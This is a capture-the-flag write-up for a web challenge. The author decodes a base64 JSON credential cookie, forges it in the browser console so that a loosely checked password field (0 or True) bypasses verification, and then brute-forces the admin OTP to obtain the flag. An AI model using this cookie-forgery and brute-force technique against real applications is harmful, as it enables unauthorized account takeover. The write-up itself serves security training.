If we login as guest/guest/1234, we find out tht there's a cookie for crendentials.

--------------------------
document.cookie
credential="WyJndWVzdCIsICJndWVzdCIsICIxMjM0Il0="
--------------------------

so if we decrypt the base64 string,
--------------------------
atob("WyJndWVzdCIsICJndWVzdCIsICIxMjM0Il0=")
"["guest", "guest", "1234"]"
--------------------------

It becomes ["guest", "guest", "1234"], which we can now conclude that it's a json.

as we go through further, 
we found out that it redirects to the page if we write True, but it gives credential error with true.

Considering that we can bypass the username, 
We have successfully bypassed password verification after trying out several codes from errors that we've got.

--------------------------
document.cookie='credential="'+btoa('["guest",True,1234]')+'"';
document.location.href="http://challenges.wargame.vn:50003/";
(Redirects)
--------------------------

--------------------------
document.cookie='credential="'+btoa('["guest",1,1234]')+'"';
document.location.href="http://challenges.wargame.vn:50003/";
(Wrong credentials)
--------------------------

--------------------------
document.cookie='credential="'+btoa('["guest",False,1234]')+'"';
document.location.href="http://challenges.wargame.vn:50003/";
(Redirects)
--------------------------

--------------------------
document.cookie='credential="'+btoa('["guest",0,1234]')+'"';
document.location.href="http://challenges.wargame.vn:50003/";
(info page)
--------------------------

So, we can now access admin by bruteforcing the OTP!
--------------------------
document.cookie='credential="'+btoa('["admin",0,0001]')+'"';
document.location.href="http://challenges.wargame.vn:50003/";
(Wrong credentials)
.
.
.
document.cookie='credential="'+btoa('["admin",0,7331]')+'"';
document.location.href="http://challenges.wargame.vn:50003/";
(info page)
---------------------------


Flag is: Good boy! 0x3004{goooo_home_homie}